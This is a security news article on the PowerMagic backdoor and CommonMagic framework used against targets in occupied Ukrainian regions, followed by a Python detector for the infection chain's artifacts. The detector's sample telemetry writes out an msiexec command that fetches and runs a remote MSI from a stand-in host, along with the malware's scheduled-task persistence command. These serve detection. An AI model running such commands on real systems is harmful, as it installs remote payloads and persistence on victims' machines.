Cyber Warfare: pro-Russian actors in Ukraine hit by PowerMagic and CommonMagic
Pro-Russian actors in Ukraine hit by PowerMagic and CommonMagic. According to Kaspersky's researchers, victims navigate to a URL pointing to a ZIP archive that holds two files: a decoy document and a malicious LNK that leads to infection.
PowerMagic and CommonMagic are two malware strains used against Russia-aligned government bodies and organizations in the Donetsk, Lugansk and Crimea regions. Kaspersky's researchers discovered the activity and named the new APT Bad Magic. Victims are lured by spear phishing or similar methods to a URL pointing to a ZIP archive hosted on a malicious web server. The archive contains two files: a decoy document (the researchers found PDF, XLSX and DOCX versions) and a malicious LNK file with a double extension that starts the infection when opened. In several cases the content of the decoy document was directly related to the name of the malicious LNK, to trick the user into opening it. The LNK points to a remotely hosted malicious MSI file that is downloaded and started by the Windows Installer executable. The MSI is effectively a dropper package: it contains an encrypted next-stage payload, a dropper script and a decoy document that is shown to the victim.
The second and final stage of the malware infection
The next-stage script finalizes the installation: it opens the decoy document to show it to the user, writes two files named config and manutil.vbs to %APPDATA%\WinEventCom, and creates a Task Scheduler job named WindowsActiveXTaskTrigger that runs the command wscript.exe %APPDATA%\WinEventCom\manutil.vbs every day. The script manutil.vbs, dropped by the initial package, is a loader for a previously unknown backdoor written in PowerShell that Kaspersky named PowerMagic.

All the PowerMagic victims were also infected with a more complex, previously unseen modular malicious framework that the researchers named CommonMagic. Because it appeared after the initial infection with the PowerShell backdoor, the researchers believe CommonMagic is deployed via PowerMagic. The CommonMagic framework consists of several executable modules, all stored in the directory C:\ProgramData\CommonCommand. The modules start as standalone executable files and communicate with each other via named pipes. There are dedicated modules for interaction with the C&C server, for encryption and decryption of the C&C traffic, and for the various malicious actions.
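The artifacts named in the two paragraphs above (a remote MSI started by Windows Installer, the WinEventCom loader launched by wscript.exe, the WindowsActiveXTaskTrigger task, and executables under C:\ProgramData\CommonCommand) map directly onto host telemetry. The following is an added example written for this page, not code from Kaspersky or from the article: a small Python detector that runs those four checks over process-creation and task-creation events. The event field names, the sample telemetry (including the example.invalid URL and the module.exe file name) are constructed for the example and are not indicators from the report; paths are matched by suffix because %APPDATA% expands to a different directory for every user.

```python
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple

# Minimal event model for this example (field names are this example's
# own choice, not a Sysmon or Kaspersky schema). "process" events carry
# Sysmon Event ID 1 style fields; "task_created" events carry what a
# Security log 4698 record or an exported task XML would show.
@dataclass
class Event:
    kind: str                 # "process" or "task_created"
    image: str = ""           # full path of the started executable
    command_line: str = ""    # its command line
    task_name: str = ""       # scheduled task name (task_created only)
    task_action: str = ""     # command the task runs (task_created only)


def _norm(s: str) -> str:
    """Lower-case and unify separators so case or slash tricks do not evade a match."""
    return s.lower().replace("/", "\\")


# Each rule is (name, predicate). One rule per stage described in the article.
RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    # Stage 1: the LNK makes Windows Installer fetch and run a remote MSI.
    ("msiexec_remote_msi",
     lambda e: e.kind == "process"
               and _norm(e.image).endswith("\\msiexec.exe")
               and re.search(r"https?://\S+\.msi\b", e.command_line, re.I) is not None),
    # Stage 2: the dropped PowerMagic loader, run through wscript.exe.
    ("powermagic_loader_vbs",
     lambda e: e.kind == "process"
               and _norm(e.image).endswith("\\wscript.exe")
               and "\\wineventcom\\manutil.vbs" in _norm(e.command_line)),
    # Persistence: the daily scheduled task, by name or by its action.
    ("powermagic_task",
     lambda e: e.kind == "task_created"
               and (e.task_name.lower() == "windowsactivextasktrigger"
                    or "\\wineventcom\\manutil.vbs" in _norm(e.task_action))),
    # Stage 3: any CommonMagic module started from its module directory.
    ("commonmagic_module",
     lambda e: e.kind == "process"
               and _norm(e.image).startswith("c:\\programdata\\commoncommand\\")),
]


def scan(events: List[Event]) -> List[Tuple[str, Event]]:
    """Return every (rule_name, event) pair that matched."""
    hits = []
    for ev in events:
        for name, pred in RULES:
            if pred(ev):
                hits.append((name, ev))
    return hits


def chain_stages_seen(events: List[Event]) -> set:
    """Distinct stages observed; several stages on one host is far stronger
    evidence than any single indicator."""
    return {name for name, _ in scan(events)}


# Constructed sample telemetry (not real logs): one infected host followed
# by two benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\msiexec.exe",
          r'msiexec.exe /i "http://example.invalid/update/payment.msi" /qn'),
    Event("task_created", task_name="WindowsActiveXTaskTrigger",
          task_action=r"wscript.exe %APPDATA%\WinEventCom\manutil.vbs"),
    Event("process", r"C:\Windows\System32\wscript.exe",
          r"wscript.exe C:\Users\alice\AppData\Roaming\WinEventCom\manutil.vbs"),
    # module.exe is a hypothetical name; the article does not name the modules
    Event("process", r"C:\ProgramData\CommonCommand\module.exe", "module.exe"),
    # benign: a local MSI install and an unrelated logon script
    Event("process", r"C:\Windows\System32\msiexec.exe",
          r"msiexec.exe /i C:\Temp\installer.msi /qn"),
    Event("process", r"C:\Windows\System32\wscript.exe",
          r"wscript.exe \\fileserver\netlogon\map_drives.vbs"),
]

if __name__ == "__main__":
    for name, ev in scan(SAMPLE_EVENTS):
        print(f"{name:24} {ev.image or ev.task_name}")
```

The task rule only sees something if task creation is logged: on Windows that means the Security log with "Audit Other Object Access Events" enabled (Event ID 4698) or the Task Scheduler operational log, so on hosts without that auditing the wscript.exe rule is the one that will catch the daily loader run. The remote-MSI rule is generic by design and will also flag legitimate web-hosted installers, which is why the chain score, not a single rule, should drive an alert.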